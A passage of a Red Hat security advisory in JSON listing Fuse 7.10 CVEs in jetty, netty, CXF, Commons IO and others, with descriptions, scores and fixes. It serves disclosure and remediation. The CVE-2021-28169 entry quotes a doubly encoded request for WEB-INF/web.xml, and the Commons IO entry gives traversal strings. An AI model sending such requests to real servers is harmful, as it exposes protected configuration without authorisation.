The highest threat from this vulnerability is to data confidentiality.", "title": "Vulnerability description" }, { "category": "summary", "text": "jetty: Symlink directory exposes webapp directory contents", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), the hive/presto/hadoop components that comprise the OCP metering stack, ship the vulnerable version of jetty.\nSince the release of OCP 4.6, the metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated\n\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nRed Hat CodeReady Studio 12 is not affected by this vulnerability because it does not ship a vulnerable version of jetty.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-28163" }, { "category": "external", "summary": "RHBZ#1945710", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945710" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-28163", "url": "https://www.cve.org/CVERecord?id=CVE-2021-28163" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-28163", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28163" }, { "category": "external", 
"summary": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-j6qj-j888-vvgq", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-j6qj-j888-vvgq" } ], "release_date": "2021-04-01T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "jetty: Symlink directory exposes webapp directory contents" }, { "cve": "CVE-2021-28164", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": "2021-04-01T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1945712" } ], "notes": [ { "category": "description", "text": "In Jetty the default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. 
An attacker can use this vulnerability to reveal sensitive information regarding the implementation of a web application.", "title": "Vulnerability description" }, { "category": "summary", "text": "jetty: Ambiguous paths can access WEB-INF", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nRed Hat CodeReady Studio 12 is not affected by this vulnerability because it does not ship a vulnerable version of jetty.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-28164" }, { "category": "external", "summary": "RHBZ#1945712", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945712" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-28164", "url": "https://www.cve.org/CVERecord?id=CVE-2021-28164" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-28164", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28164" }, { "category": "external", "summary": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5" } ], "release_date": "2021-04-01T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, 
configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "jetty: Ambiguous paths can access WEB-INF" }, { "cve": "CVE-2021-28169", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": "2021-06-09T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1971016" } ], "notes": [ { "category": "description", "text": "For Eclipse Jetty versions \u003c= 9.4.40, \u003c= 10.0.2, \u003c= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory. For example a request to `/concat?/%2557EB-INF/web.xml` can retrieve the web.xml file. 
This can reveal sensitive information regarding the implementation of a web application.", "title": "Vulnerability description" }, { "category": "summary", "text": "jetty: requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), the hive/presto/hadoop components that comprise the OCP metering stack, ship the vulnerable version of jetty.\nSince the release of OCP 4.6, the metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated\n\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nRed Hat CodeReady Studio 12 is not affected by this flaw because it does not ship the vulnerable components (ConcatServlet or WelcomeFilter) of jetty.\n\nRed Hat Enterprise Linux 8 is not affected by this flaw because it does not ship the vulnerable components (ConcatServlet or WelcomeFilter) of jetty.\n\nRed Hat Enterprise Linux 7 ships the vulnerable component of jetty, but only in the optional repository and thus this flaw is out of support scope for Red Hat Enterprise Linux 7.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-28169" }, { 
"category": "external", "summary": "RHBZ#1971016", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1971016" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-28169", "url": "https://www.cve.org/CVERecord?id=CVE-2021-28169" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-28169", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28169" } ], "release_date": "2021-06-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "jetty: requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory" }, { "cve": "CVE-2021-28170", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-05-26T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1965497" } ], "notes": [ { "category": "description", "text": "In the Jakarta Expression Language implementation 3.0.3 and earlier, a bug in the ELParserTokenManager 
enables invalid EL expressions to be evaluated as if they were valid.", "title": "Vulnerability description" }, { "category": "summary", "text": "jakarta-el: ELParserTokenManager enables invalid EL expressions to be evaluate", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-28170" }, { "category": "external", "summary": "RHBZ#1965497", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1965497" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-28170", "url": "https://www.cve.org/CVERecord?id=CVE-2021-28170" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-28170", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28170" }, { "category": "external", "summary": "https://securitylab.github.com/advisories/GHSL-2020-021-jakarta-el/", "url": "https://securitylab.github.com/advisories/GHSL-2020-021-jakarta-el/" } ], "release_date": "2021-04-01T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", 
"attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "jakarta-el: ELParserTokenManager enables invalid EL expressions to be evaluate" }, { "cve": "CVE-2021-29425", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2021-04-12T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1948752" } ], "notes": [ { "category": "description", "text": "In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), if the calling code would use the result to construct a path value.", "title": "Vulnerability description" }, { "category": "summary", "text": "apache-commons-io: Limited path traversal in Apache Commons IO 2.2 to 2.6", "title": "Vulnerability summary" }, { "category": "other", "text": "While the apache-commons-io package included in Red Hat Enterprise Linux 8 Maven App Stream contains the vulnerable code, it is not used in any way by Maven or other packages in this module. 
This package is not an API component of Maven, thus the affected code can not be reached in any supported scenario.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-29425" }, { "category": "external", "summary": "RHBZ#1948752", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948752" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-29425", "url": "https://www.cve.org/CVERecord?id=CVE-2021-29425" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-29425", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29425" } ], "release_date": "2021-04-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": 
"3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "apache-commons-io: Limited path traversal in Apache Commons IO 2.2 to 2.6" }, { "cve": "CVE-2021-30129", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-07-12T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1981527" } ], "notes": [ { "category": "description", "text": "A vulnerability in sshd-core of Apache Mina SSHD allows an attacker to overflow the server causing an OutOfMemory error. This issue affects the SFTP and port forwarding features of Apache Mina SSHD version 2.0.0 and later versions. It was addressed in Apache Mina SSHD 2.7.0", "title": "Vulnerability description" }, { "category": "summary", "text": "mina-sshd-core: Memory leak denial of service in Apache Mina SSHD Server", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Critical flaws.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-30129" }, { "category": "external", "summary": "RHBZ#1981527", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1981527" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-30129", "url": "https://www.cve.org/CVERecord?id=CVE-2021-30129" }, { "category": "external", "summary": 
"https://nvd.nist.gov/vuln/detail/CVE-2021-30129", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30129" } ], "release_date": "2021-07-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "mina-sshd-core: Memory leak denial of service in Apache Mina SSHD Server" }, { "cve": "CVE-2021-30468", "cwe": { "id": "CWE-835", "name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)" }, "discovery_date": "2021-06-16T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1973392" } ], "notes": [ { "category": "description", "text": "A vulnerability in the JsonMapObjectReaderWriter of Apache CXF allows an attacker to submit malformed JSON to a web service, which results in the thread getting stuck in an infinite loop, consuming CPU indefinitely. 
This issue affects Apache CXF versions prior to 3.4.4; Apache CXF versions prior to 3.3.11.", "title": "Vulnerability description" }, { "category": "summary", "text": "CXF: Denial of service vulnerability in parsing JSON via JsonMapObjectReaderWriter", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP) the openshift4/ose-logging-elasticsearch6 container bundles the vulnerable version of apache-cxf, but OCP 4.6 is Out Of Support Scope (OOSS) for Moderate and Low impact vulnerabilities because it is now in the Maintenance Phase of the support, hence this component is marked as ooss. Starting in 4.7 this component is delivered as part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8 container) and is not affected by this vulnerability.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-30468" }, { "category": "external", "summary": "RHBZ#1973392", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1973392" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-30468", "url": "https://www.cve.org/CVERecord?id=CVE-2021-30468" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-30468", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30468" }, { "category": "external", "summary": "http://cxf.apache.org/security-advisories.data/CVE-2021-30468.txt.asc?version=1\u0026modificationDate=1623835369690\u0026api=v2", "url": 
"http://cxf.apache.org/security-advisories.data/CVE-2021-30468.txt.asc?version=1\u0026modificationDate=1623835369690\u0026api=v2" } ], "release_date": "2021-06-16T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "CXF: Denial of service vulnerability in parsing JSON via JsonMapObjectReaderWriter" }, { "cve": "CVE-2021-34428", "cwe": { "id": "CWE-613", "name": "Insufficient Session Expiration" }, "discovery_date": "2021-06-22T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1974891" } ], "notes": [ { "category": "description", "text": "A flaw was discovered in the jetty-server, where if an exception is thrown from the SessionListener#sessionDestroyed() method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts, this could result in a session not being invalidated and a shared-computer application being left logged in. 
The highest threat from this vulnerability is to data confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "jetty: SessionListener can prevent a session from being invalidated breaking logout", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), the hive/presto/hadoop components that comprise the OCP metering stack, ship the vulnerable version of jetty. Since the release of OCP 4.6, the metering product has been deprecated [1], hence the affected components are marked as wontfix. This may be fixed in the future.\n\nOCP 3.11 is out of the support scope for Moderate and Low impact vulnerabilities because is already in the Maintenance Support phase, hence the affected OCP 3.11 component has been marked as wontifx.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-34428" }, { "category": "external", "summary": "RHBZ#1974891", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1974891" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-34428", "url": "https://www.cve.org/CVERecord?id=CVE-2021-34428" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-34428", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34428" }, { "category": "external", "summary": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-m6cp-vxjx-65j6", "url": 
"https://github.com/eclipse/jetty.project/security/advisories/GHSA-m6cp-vxjx-65j6" } ], "release_date": "2021-06-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "workaround", "details": "Applications should catch all Throwables within their SessionListener#sessionDestroyed() implementations.", "product_ids": [ "Red Hat Fuse 7.10" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "jetty: SessionListener can prevent a session from being invalidated breaking logout" }, { "cve": "CVE-2021-37136", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2004133" } ], "notes": [ { "category": "description", "text": "A flaw was found in Netty\u0027s netty-codec due to size restrictions for decompressed data in the Bzip2Decoder. 
By sending a specially-crafted input, a remote attacker could cause a denial of service.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data", "title": "Vulnerability summary" }, { "category": "other", "text": "In the OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack ship the vulnerable version of netty-codec package. Since the release of OCP 4.6, the Metering product has been deprecated [1], so the affected components are marked as wontfix. This may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37136" }, { "category": "external", "summary": "RHBZ#2004133", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37136", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37136" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136" 
}, { "category": "external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" } ], "release_date": "2021-09-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data" }, { "cve": "CVE-2021-37137", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2004135" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Netty\u0027s netty-codec due to unrestricted chunk lengths in the SnappyFrameDecoder. 
By sending a specially-crafted input, a remote attacker could cause excessive memory usage resulting in a denial of service.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37137" }, { "category": "external", "summary": "RHBZ#2004135", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37137", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37137" }, { "category": "external", "summary": 
